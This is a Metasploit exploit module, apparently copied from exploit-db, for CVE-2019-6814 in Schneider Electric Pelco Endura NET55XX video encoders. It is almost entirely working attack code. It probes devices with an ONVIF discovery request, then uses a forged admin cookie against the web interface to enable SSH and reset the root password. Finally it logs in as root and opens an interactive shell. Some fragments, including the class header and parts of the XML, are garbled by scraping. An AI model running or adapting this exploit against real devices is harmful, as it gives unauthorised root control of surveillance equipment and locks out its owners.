Schneider Electric Pelco Endura NET55XX Encoder
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule "Schneider Electric Pelco Endura NET55XX Encoder",
'Description' => %q(
This module exploits inadequate access controls within the webUI to enable
the SSH service and change the root password. This module has been tested successfully
on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500, NET5516, NET550 versions.
),
'License' => MSF_LICENSE,
'Author' =>
[
'Lucas Dinucci ',
'Vitor Esperança '
],
'References' =>
[
['CVE', '2019-6814'],
['URL', 'https://www.schneider-electric.com/en/download/document/SEVD-2019-134-01/']
],
'Payload' =>
{
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find'
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [ [ "Universal", {} ] ],
'Privileged' => true,
'DisclosureDate' => "Jan 25 2019",
'DefaultTarget' => 0))
register_options(
[
OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account', Rex::Text.rand_text_alphanumeric(16)]),
OptInt.new('TIMEOUT', [ true, 'Timeout for the requests', 10])
]
)
register_advanced_options(
[
OptInt.new('UDP_PORT', [ true, 'UDP port for the ONVIF service', 3702]),
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
]
)
end
def new_password
datastore['NEW_PASSWORD']
end
def check
xmlPayload = ''
''
''
'http://schemas.xmlsoap.org/ws/2005/04/discovery/Probe'
'uuid:f3d577a3-431f-4450-ab45-b480042b9c74'
''
'http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous'
''
'urn:schemas-xmlsoap-org:ws:2005:04:discovery'
' '
''
''
'dp0:NetworkVideoTransmitter'
''
''
''
connect_udp(true, {'RPORT' => datastore['UDP_PORT']})
udp_sock.put(xmlPayload)
resp = []
resp < 'POST',
'uri' => normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh'),
'data' => post,
'headers' =>
{
'Cookie' => 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647',
'Content-Type' => 'application/json;charset=utf-8'
}
}, timeout=datastore['TIMEOUT'])
fail_with(Failure::UnexpectedReply, "Failed to change root password") unless login && login.code == 200
print_good("#{rhost}:80 - Successfully changed the root password...")
print_good("#{rhost}:80 - New credentials: User: root / Password: #{new_password}")
end
def do_login
change_password
print_status("#{rhost}:22 - Attempt to start a SSH connection...")
factory = ssh_socket_factory
opts = {
:auth_methods => ['password', 'keyboard-interactive'],
:port => 22,
:use_agent => false,
:config => true,
:password => new_password,
:proxy => factory,
:non_interactive => true,
:verify_host_key => :never
}
opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
begin
ssh = nil
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
ssh = Net::SSH.start(datastore['RHOST'], 'root', opts)
end
rescue Rex::ConnectionError
rescue Net::SSH::Disconnect, ::EOFError
print_error "#{rhost}:22 SSH - Disconnected during negotiation"
rescue ::Timeout::Error
print_error "#{rhost}:22 SSH - Timed out during negotiation"
rescue Net::SSH::AuthenticationFailed
print_error "#{rhost}:22 SSH - Failed authentication"
rescue Net::SSH::Exception => e
print_error "#{rhost}:22 SSH Error: #{e.class} : #{e.message}"
end
if ssh
conn = Net::SSH::CommandStream.new(ssh)
return conn
end
end
def exploit
conn = do_login
if conn
print_good("#{rhost}:22 - Session established ")
handler(conn.lsock)
end
end
end
https://www.exploit-db.com/exploits/47186
Gloss